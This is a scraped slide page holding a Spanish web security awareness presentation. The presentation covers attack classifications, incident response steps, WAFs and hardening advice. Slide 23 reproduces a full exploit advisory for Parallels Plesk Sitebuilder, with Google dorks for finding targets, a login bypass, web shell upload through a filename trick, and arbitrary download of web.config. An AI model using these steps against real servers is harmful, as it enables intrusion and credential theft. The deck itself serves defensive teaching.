True Mother's Speech at THE PENTECOST SERVICE..pdfTrue Mother's Speech at THE PENTECOST SERVICE..pdf
True Mother's Speech at THE PENTECOST SERVICE..pdf
Mercedes Gonzalez
 
CONCLUSIONES-DESCRIPTIVAS NIVEL PRIMARIA
CONCLUSIONES-DESCRIPTIVAS NIVEL PRIMARIACONCLUSIONES-DESCRIPTIVAS NIVEL PRIMARIA
CONCLUSIONES-DESCRIPTIVAS NIVEL PRIMARIA
BetzabePecheSalcedo1
 
3° UNIDAD 3 CUIDAMOS EL AMBIENTE RECICLANDO EN FAMILIA 933623393 PROF YESSENI...
3° UNIDAD 3 CUIDAMOS EL AMBIENTE RECICLANDO EN FAMILIA 933623393 PROF YESSENI...3° UNIDAD 3 CUIDAMOS EL AMBIENTE RECICLANDO EN FAMILIA 933623393 PROF YESSENI...
3° UNIDAD 3 CUIDAMOS EL AMBIENTE RECICLANDO EN FAMILIA 933623393 PROF YESSENI...
rosannatasaycoyactay
 
Conocemos la ermita de Ntra. Sra. del Arrabal
Conocemos la ermita de Ntra. Sra. del ArrabalConocemos la ermita de Ntra. Sra. del Arrabal
Conocemos la ermita de Ntra. Sra. del Arrabal
Profes de Relideleón Apellidos
 
Semana 10-TSM-del 27 al 31 de mayo 2024.pptx
Semana 10-TSM-del 27 al 31 de mayo 2024.pptxSemana 10-TSM-del 27 al 31 de mayo 2024.pptx
Semana 10-TSM-del 27 al 31 de mayo 2024.pptx
LorenaCovarrubias12
 
PRÁCTICAS PEDAGOGÍA.pdf_Educación Y Sociedad_AnaFernández
PRÁCTICAS PEDAGOGÍA.pdf_Educación Y Sociedad_AnaFernándezPRÁCTICAS PEDAGOGÍA.pdf_Educación Y Sociedad_AnaFernández
PRÁCTICAS PEDAGOGÍA.pdf_Educación Y Sociedad_AnaFernández
Ruben53283
 
c3.hu3.p3.p2.Superioridad e inferioridad en la sociedad.pptx
c3.hu3.p3.p2.Superioridad e inferioridad en la sociedad.pptxc3.hu3.p3.p2.Superioridad e inferioridad en la sociedad.pptx
c3.hu3.p3.p2.Superioridad e inferioridad en la sociedad.pptx
Martín Ramírez
 
El fundamento del gobierno de Dios. Lec. 09. docx
El fundamento del gobierno de Dios. Lec. 09. docxEl fundamento del gobierno de Dios. Lec. 09. docx
El fundamento del gobierno de Dios. Lec. 09. docx
Alejandrino Halire Ccahuana
 
Proceso de admisiones en escuelas infantiles de Pamplona
Proceso de admisiones en escuelas infantiles de PamplonaProceso de admisiones en escuelas infantiles de Pamplona
Proceso de admisiones en escuelas infantiles de Pamplona
Edurne Navarro Bueno
 
Un libro sin recetas, para la maestra y el maestro Fase 3.pdf
Un libro sin recetas, para la maestra y el maestro Fase 3.pdfUn libro sin recetas, para la maestra y el maestro Fase 3.pdf
Un libro sin recetas, para la maestra y el maestro Fase 3.pdf
sandradianelly
 
CUENTO EL TIGRILLO DESOBEDIENTE PARA INICIAL
CUENTO EL TIGRILLO DESOBEDIENTE PARA INICIALCUENTO EL TIGRILLO DESOBEDIENTE PARA INICIAL
CUENTO EL TIGRILLO DESOBEDIENTE PARA INICIAL
DivinoNioJess885
 

Último (20)

CALENDARIZACION DEL MES DE JUNIO - JULIO 24
CALENDARIZACION DEL MES DE JUNIO - JULIO 24CALENDARIZACION DEL MES DE JUNIO - JULIO 24
CALENDARIZACION DEL MES DE JUNIO - JULIO 24
 
Friedrich Nietzsche. Presentación de 2 de Bachillerato.
Friedrich Nietzsche. Presentación de 2 de Bachillerato.Friedrich Nietzsche. Presentación de 2 de Bachillerato.
Friedrich Nietzsche. Presentación de 2 de Bachillerato.
 
Asistencia Tecnica Cultura Escolar Inclusiva Ccesa007.pdf
Asistencia Tecnica Cultura Escolar Inclusiva Ccesa007.pdfAsistencia Tecnica Cultura Escolar Inclusiva Ccesa007.pdf
Asistencia Tecnica Cultura Escolar Inclusiva Ccesa007.pdf
 
Fase 2, Pensamiento variacional y trigonometrico
Fase 2, Pensamiento variacional y trigonometricoFase 2, Pensamiento variacional y trigonometrico
Fase 2, Pensamiento variacional y trigonometrico
 
Automatización de proceso de producción de la empresa Gloria SA (1).pptx
Automatización de proceso de producción de la empresa Gloria SA (1).pptxAutomatización de proceso de producción de la empresa Gloria SA (1).pptx
Automatización de proceso de producción de la empresa Gloria SA (1).pptx
 
ACERTIJO DE CARRERA OLÍMPICA DE SUMA DE LABERINTOS. Por JAVIER SOLIS NOYOLA
ACERTIJO DE CARRERA OLÍMPICA DE SUMA DE LABERINTOS. Por JAVIER SOLIS NOYOLAACERTIJO DE CARRERA OLÍMPICA DE SUMA DE LABERINTOS. Por JAVIER SOLIS NOYOLA
ACERTIJO DE CARRERA OLÍMPICA DE SUMA DE LABERINTOS. Por JAVIER SOLIS NOYOLA
 
PRESENTACION DE LA SEMANA NUMERO 8 EN APLICACIONES DE INTERNET
PRESENTACION DE LA SEMANA NUMERO 8 EN APLICACIONES DE INTERNETPRESENTACION DE LA SEMANA NUMERO 8 EN APLICACIONES DE INTERNET
PRESENTACION DE LA SEMANA NUMERO 8 EN APLICACIONES DE INTERNET
 
Testimonio Paco Z PATRONATO_Valencia_24.pdf
Testimonio Paco Z PATRONATO_Valencia_24.pdfTestimonio Paco Z PATRONATO_Valencia_24.pdf
Testimonio Paco Z PATRONATO_Valencia_24.pdf
 
Horarios Exámenes EVAU Ordinaria 2024 de Madrid
Horarios Exámenes EVAU Ordinaria 2024 de MadridHorarios Exámenes EVAU Ordinaria 2024 de Madrid
Horarios Exámenes EVAU Ordinaria 2024 de Madrid
 
True Mother's Speech at THE PENTECOST SERVICE..pdf
True Mother's Speech at THE PENTECOST SERVICE..pdfTrue Mother's Speech at THE PENTECOST SERVICE..pdf
True Mother's Speech at THE PENTECOST SERVICE..pdf
 
CONCLUSIONES-DESCRIPTIVAS NIVEL PRIMARIA
CONCLUSIONES-DESCRIPTIVAS NIVEL PRIMARIACONCLUSIONES-DESCRIPTIVAS NIVEL PRIMARIA
CONCLUSIONES-DESCRIPTIVAS NIVEL PRIMARIA
 
3° UNIDAD 3 CUIDAMOS EL AMBIENTE RECICLANDO EN FAMILIA 933623393 PROF YESSENI...
3° UNIDAD 3 CUIDAMOS EL AMBIENTE RECICLANDO EN FAMILIA 933623393 PROF YESSENI...3° UNIDAD 3 CUIDAMOS EL AMBIENTE RECICLANDO EN FAMILIA 933623393 PROF YESSENI...
3° UNIDAD 3 CUIDAMOS EL AMBIENTE RECICLANDO EN FAMILIA 933623393 PROF YESSENI...
 
Conocemos la ermita de Ntra. Sra. del Arrabal
Conocemos la ermita de Ntra. Sra. del ArrabalConocemos la ermita de Ntra. Sra. del Arrabal
Conocemos la ermita de Ntra. Sra. del Arrabal
 
Semana 10-TSM-del 27 al 31 de mayo 2024.pptx
Semana 10-TSM-del 27 al 31 de mayo 2024.pptxSemana 10-TSM-del 27 al 31 de mayo 2024.pptx
Semana 10-TSM-del 27 al 31 de mayo 2024.pptx
 
PRÁCTICAS PEDAGOGÍA.pdf_Educación Y Sociedad_AnaFernández
PRÁCTICAS PEDAGOGÍA.pdf_Educación Y Sociedad_AnaFernándezPRÁCTICAS PEDAGOGÍA.pdf_Educación Y Sociedad_AnaFernández
PRÁCTICAS PEDAGOGÍA.pdf_Educación Y Sociedad_AnaFernández
 
c3.hu3.p3.p2.Superioridad e inferioridad en la sociedad.pptx
c3.hu3.p3.p2.Superioridad e inferioridad en la sociedad.pptxc3.hu3.p3.p2.Superioridad e inferioridad en la sociedad.pptx
c3.hu3.p3.p2.Superioridad e inferioridad en la sociedad.pptx
 
El fundamento del gobierno de Dios. Lec. 09. docx
El fundamento del gobierno de Dios. Lec. 09. docxEl fundamento del gobierno de Dios. Lec. 09. docx
El fundamento del gobierno de Dios. Lec. 09. docx
 
Proceso de admisiones en escuelas infantiles de Pamplona
Proceso de admisiones en escuelas infantiles de PamplonaProceso de admisiones en escuelas infantiles de Pamplona
Proceso de admisiones en escuelas infantiles de Pamplona
 
Un libro sin recetas, para la maestra y el maestro Fase 3.pdf
Un libro sin recetas, para la maestra y el maestro Fase 3.pdfUn libro sin recetas, para la maestra y el maestro Fase 3.pdf
Un libro sin recetas, para la maestra y el maestro Fase 3.pdf
 
CUENTO EL TIGRILLO DESOBEDIENTE PARA INICIAL
CUENTO EL TIGRILLO DESOBEDIENTE PARA INICIALCUENTO EL TIGRILLO DESOBEDIENTE PARA INICIAL
CUENTO EL TIGRILLO DESOBEDIENTE PARA INICIAL
 

Seguridad en la web

  • 1. ¿Puede mi sitio web sufrir un ataque? ¿Qué puedo hacer?
  • 2. ¿Puede mi sitio web sufrir un ataque? La respuesta es obvia:
  • 4. Introducción a los ataques existentes Clasificación de amenazas WEB Abuso de la funcionalidad: el abuso de funcionalidad es una técnica de ataque que utiliza las propias características y funciones de un sitio web para consumir, defraudar o eludir los mecanismos de control de acceso. Fuerza bruta: una ataque de fuerza bruta es un proceso automatizado de prueba y error que se utiliza para adivinar el nombre de usuario, la contraseña, el número de tarjeta de crédito o la clave criptográfica de una persona. Desbordamiento de almacenamiento intermedio: los exploits de desbordamiento de almacenamiento intermedio son ataques que alteran el flujo de una aplicación sobrescribiendo partes de la memoria. Usurpación de contenido: la usurpación de contenido es una técnica de ataque que se utiliza para hacer creer a un usuario que determinado contenido que aparece en un sitio web es legítimo y no procede de un origen externo.
  • 5. Introducción a los ataques existentes Clasificación de amenazas WEB Predicción de sesión/credenciales: la predicción de sesión/credenciales es un método de apropiación de identidad o suplantación de un usuario de sitio web. Deducir o adivinar el valor único que identifica la sesión o el usuario concreto que efectúa el ataque. Script entre sitios: el script entre sitios (XSS) es una técnica de ataque que obliga a un sitio web a duplicar el código ejecutable proporcionado por el atacante, que se carga en el navegador de un usuario. Un usuario de un script entre sitios puede verse expropiado de su cuenta (robo de cookies), su navegador puede ser redirigido a otra ubicación, o se le puede mostrar contenido fraudulento en el sitio web que esté visitando. Denegación de servicio: la denegación de servicio (DoS) es una técnica de ataque cuyo objetivo es impedir que un sitio web ofrezca una actividad normal a los usuarios.
  • 6. Introducción a los ataques existentes Clasificación de amenazas WEB Indexación de directorios: el listado/indexación automática de directorios es una función de servidor que lista todos los archivos en un directorio solicitado si el archivo básico normal (index.html/home.html/default.htm) no está presente. Ataque de serie de formato: los ataques de serie de formato alteran el flujo de una aplicación utilizando características de la biblioteca de formatos de series para acceder a otro espacio de la memoria. Filtrado de información: el filtraje de información se produce cuando un sitio web revela datos confidenciales, por ejemplo comentarios de un desarrollador o mensajes de error, que pueden ayudar a un atacante a aprovecharse del sistema. Anti automatización insuficiente: la anti automatización insuficiente se produce cuando un sitio web permite a un atacante automatizar un proceso que sólo debe realizarse manualmente.
  • 7. Introducción a los ataques existentes Clasificación de amenazas WEB Autenticación insuficiente: la autenticación insuficiente se produce cuando un sitio web permite a un atacante acceder a contenido o funciones confidenciales sin autenticar correctamente sus permisos de acceso. Autorización insuficiente: la autorización insuficiente se produce cuando un sitio web permite el acceso a contenido o funciones confidenciales que deben requerir un incremento de las restricciones de control de acceso. Validación de proceso insuficiente: la validación de proceso insuficiente se produce cuando un sitio web permite a un atacante eludir el control de flujo previsto de una aplicación. Caducidad de sesión insuficiente: la caducidad de sesión insuficiente se produce cuando un sitio web permite a un atacante reutilizar credenciales de sesión o ID de sesión antiguos para llevar a cabo la autorización. La caducidad de sesión insuficiente aumenta la exposición de un sitio web a los ataques que roban o suplantan a otros usuarios.
  • 8. Introducción a los ataques existentes Clasificación de amenazas WEB Inyección LDAP: la inyección LDAP es una técnica de ataque utilizada para aprovecharse de los sitios web que crean sentencias LDAP (Lightweight Directory Access Protocol) a partir de entradas proporcionadas por los usuarios. Envío de mandatos del SO: el envío de mandatos del SO es una técnica de ataque utilizada para aprovecharse de los sitios web mediante la ejecución de mandatos del sistema operativo a través de la manipulación de la entrada de la aplicación. Cruce de vía de acceso: la técnica de ataque de cruce de vía de acceso fuerza el acceso a archivos, directorios y mandatos que pueden estar ubicados potencialmente fuera del directorio raíz de documentos. Un atacante podría manipular un URL de forma que el sitio web ejecutará o revelará el contenido de archivos arbitrarios en cualquier parte del servidor web.
  • 9. Introducción a los ataques existentes Clasificación de amenazas WEB Ubicación de recursos predecible: la ubicación de recursos predecible es una técnica de ataque utilizada para descubrir contenido y funciones ocultas de un sitio web. El ataque, que se vale de considerar la información de la que dispone, es una búsqueda de fuerza bruta en busca de contenido que no está pensado para mostrarse públicamente. Archivos temporales, archivos de copia de seguridad, archivos de configuración y archivos de ejemplo son todos ejemplos de archivos potencialmente sobrantes. Fijación de sesión: la fijación de sesión es una técnica de ataque que fuerza un ID de sesión de usuario a un valor explícito. Inyección SQL: la inyección SQL es una técnica de ataque utilizada para aprovecharse de los sitios web que crean sentencias SQL a partir de entradas proporcionadas por los usuarios. Inyección SSI: la inyección SSI (inclusión del lado del servidor) es una técnica de aprovechamiento del lado del servidor que permite a un atacante enviar código en una aplicación, que posteriormente el servidor web ejecutará localmente.
  • 10. Introducción a los ataques existentes Clasificación de amenazas WEB Validación de recuperación de contraseña débil: la validación de recuperación de contraseña débil se produce cuando un sitio web permite a un atacante obtener, cambiar o recuperar ilegalmente la contraseña de otro usuario. Inyección XPath: la inyección XPath es una técnica de ataque utilizada para aprovecharse de los sitios web que crean consultas XPath a partir de entradas proporcionadas por los usuarios.
  • 11. Introducción a los ataques existentes =¿$? Consecuencias derivadas de los ataques
  • 12. Introducción a los ataques existentes Panorama…
  • 13. Introducción a los ataques existentes Panorama… Crouching Yeti / Energetic Bear (Verano 2014)
  • 14. Introducción a los ataques existentes Panorama…
  • 15. Introducción a los ataques existentes
  • 16. Introducción a los ataques existentes
  • 17. Introducción a los ataques existentes http://www.ddossite.com/ http://youtu.be/vn-lU3Zu3dw http://youtu.be/aCacibJa0Ps
  • 18. Introducción a los ataques existentes http://www.digitalattackmap.com
  • 19. Introducción a los ataques existentes
  • 20. Introducción a los ataques existentes
  • 21. Introducción a los ataques existentes
  • 22. Introducción a los ataques existentes
  • 23. #+++++++++++++++++++++++++++++++++++++++++++++++++++++++++ # Title : Multiple Vulnerabilities in Parallels® Plesk Sitebuilder # Author : alieye # vendor : http://www.parallels.com/ # Contact : cseye_ut@yahoo.com # Risk : High # Class: Remote # # Google Dork: # inurl::2006/Sites ext:aspx # inurl::2006 inurl:.ashx?mediaid # intext:"© Copyright 2004-2007 SWsoft." ext:aspx # inurl:Wizard/HostingPreview.aspx?SiteID # # Date: 23/07/2014 # os : windows server 2003 # poc video clip : http://alieye.persiangig.com/video/plesk.rar/download # # version : for uploading shell (Parallels® Plesk panel 9.5 - Parallels® Plesk Sitebuilder 4.5) Copyright 2004-2010 # version : for other bug (Parallels® Plesk panel 9.5 - Parallels® Plesk Sitebuilder 4.5) Copyright 2004-2014 #++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1-bypass loginpage (all version) http://victim.com:2006/login.aspx change url path to http://victim.com:2006/wizard 2-uploading shell via Live HTTP Headers(Copyright 2004-2010) Tools Needed: Live HTTP Headers, Backdoor Shell Step 1: Locate upload form on logo upload section in http://victim.com:2006/Wizard/DesignLayout.aspx Step 2: Rename your shell to shell.asp.gif and start capturing data with Live HTTP Headers Step 3: Replay data with Live HTTP Headers - Step 4: Change [Content-Disposition: form-data; name="ctl00$ContentStep$FileUploadLogo"; filename="shell.asp.gif"rn] to [Content-Disposition: form-data; name="ctl00$ContentStep$FileUploadLogo"; filename="shell.asp.asp"rn] Step 5: go to shell path: http://victim.com:2006/Sites/GUID Sitename created/App_Themes/green/images/shell_asp.asp 3-Arbitrary File Download Vulnerability(all version) You can download any file from your target http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=GUID Sitename created&p=filename example: http://victim.com:2006/Wizard/EditPage/ImageManager/Site.ashx?s=4227d5ca-7614-40b6-8dc6-02460354790b&p=web.config 4-xss(all version) you can inject xss code in all module of this page http://victim.com:2006/Wizard/Edit.aspx goto this page (edit.aspx), click on one module (Blog-eShop-Forum-...) then goto "Add New Category" and insert xss code in Category description and .... Enjoy :) 5-not authentication for making a website(all version) making malicious page and phishing page with these paths http://victim.com:2006/Wizard/Pages.aspx http://victim.com:2006/Wizard/Edit.aspx #++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [#] special members: ZOD14C , 4l130h1 , bully13 , 3.14nnph , amir [#] Thanks To All cseye members and All Iranian Hackers [#] website : http://cseye.vcp.ir/ #++++++++++++++++++++++++++++++++++++++++++++++++++++++++ [#] Spt Tnx To Master of Persian Music: Hossein Alizadeh [#] Hossein Alizadeh website : http://www.hosseinalizadeh.net/ [#] download ney-nava album : http://dnl1.tebyan.net/1388/02/2009052010245138.rar #++++++++++++++++++++++++++++++++++++++++++++++++++++++++
  • 24. Introducción a los ataques existentes
  • 25. Introducción a los ataques existentes
  • 26. Introducción a los ataques existentes El objetivo principal del TOP 10 OWASP es dar a conocer a los desarrolladores, diseñadores, arquitectos, gerentes, y organizaciones sobre las consecuencias de las vulnerabilidades de seguridad más importantes en aplicaciones web. El TOP 10 provee de técnicas básicas sobre como protegerse en estas áreas de alto riesgo y también provee orientación sobre los pasos a seguir. Que se hable de top 10 no significa que no existan más vulnerabilidades!! Simplemente son las más comunes.
  • 27.
  • 28.
  • 29.
  • 31.
  • 32.
  • 33.
  • 34.
  • 35.
  • 36.
  • 37.
  • 38.
  • 39.
  • 40.
  • 41.
  • 42.
  • 43.
  • 44.
  • 45.
  • 46.
  • 47.
  • 48.
  • 49.
  • 50.
  • 51.
  • 52.
  • 53.
  • 54.
  • 56.
  • 57.
  • 58.
  • 64. He sido atacado. ¿Ahora que hago? El procedimiento varía dependiendo de múltiples variables pero podría ser algo así: 1.- Poner el sitio web atacado offline. 2.- Guardar logs, hacer backup de la base de datos y de los archivos. Aplicar FUEGO PURIFICADOR o contratar servicios de desinfección. 3.- Revisar todas las posibles extensiones vulnerables o framework e intentar determinar el punto de entrada. 4.- Reinstalar framework, plugins, plantillas, bbdd, SO, … desde un backup que se sepa que está limpio. Parchear el posible punto de entrada. 5.-Cambiar todas las contraseñas 6.- Si se ha sido intermediario de un ataque de watering hole o se cree que se han podido ver comprometidos datos de importancia, notificar a posibles usuarios afectados el incidente de seguridad.
  • 65. He sido atacado. ¿Ahora que hago? Denunciar si hemos sido victimas de un ataque Contratar servicios especializados de análisis forense para que en caso de que se quiera llevar a juicio el ataque, se disponga de pruebas válidas con las que afrontar la denuncia.
  • 66. WAF. Web Application Firewall Herramientas y servicios con los que protegernos Nos protege de: >Vulnerabilidades de sistema operativo >Vulnerabilidades de aplicación SQLi XSS LFI RFI DT … Nos tiene que quedar claro que las aplicaciones y sistemas operativos siguen siendo vulnerables. Parcheo Virtual
  • 67. WAF. Web Application Firewall Herramientas y servicios con los que protegernos De todos los colores y sabores: >Software (Open Source, Propietarios…) >Virtuales >Hardware >As a Service (En la nube)
  • 68. Herramientas y servicios con los que protegernos WAF. Web Application Firewall
  • 69. Herramientas y servicios con los que protegernos Sistemas Anti DDoS
  • 70. Herramientas y servicios con los que protegernos Servicios de monitorización de contenidos WEB+ Desinfección +IR
  • 71. Herramientas y servicios con los que protegernos Servicios de monitorización de contenidos WEB+ Desinfección +IR
  • 72. Herramientas y servicios con los que protegernos Autenticación multifactor / Protección de identidades digitales
  • 73. Herramientas y servicios con los que protegernos Hostings/Housings especializados
  • 74. Herramientas y servicios con los que protegernos Herramientas de hardening de frameworks especificos, buenas prácticas,… Guía básica seguridad Wordpress Inteco http://www.inteco.es/file/WbpsPPREE7nfCgs9ZBYoAQ Guía básica seguridad Joomla Inteco http://www.inteco.es/file/WbpsPPREE7naXKiMJlkT_g
  • 75. Herramientas y servicios con los que protegernos http://punkspider.hyperiongray.com
  • 76. Herramientas y servicios con los que protegernos http://sitecheck.sucuri.net/
  • 77. Herramientas y servicios con los que protegernos http://zulu.zscaler.com/
  • 78. Herramientas y servicios con los que protegernos
  • 79. Herramientas y servicios con los que protegernos
  • 80. Algunos consejos útiles Contar con profesionales del desarrollo web SEGURO Cuando se contrate el servicio de presencia web hablar de que ocurre en caso de que surjan vulnerabilidades, se sea victima de un ataque, tiempos de parcheo, Plan de contingencia…) Antes de poner una web online comprobar su seguridad (Revisión código, Auditoría WEB) Realizar asiduamente backups tanto de la base de datos como de la aplicación y sus ficheros asociados.
  • 81. Preparar un Plan de Recuperación ante incidentes. Entrenarse, ponerlo a prueba. No utilizar la misma contraseña para todas las cuentas Cifrar la documentación/datos online importantes Cambia de contraseñas cada cierto tiempo Usuarios y contraseñas personales e intransferibles Tener especial cuidado cuando se manejan datos sensibles (LOPD) Algunos consejos útiles
  • 82. Utilizar mecanismos de autenticación de múltiples factore. Llevar un control sobre los CMS instalados y los diferentes plugins (seguros)instalados Actualizar y parchear tanto sistemas como aplicaciones Integración de sistemas Captchas para evitar herramientas automatizadas. Contratar hostings, housings con servicios de seguridad adicionales (WAF, ADDoS) Algunos consejos útiles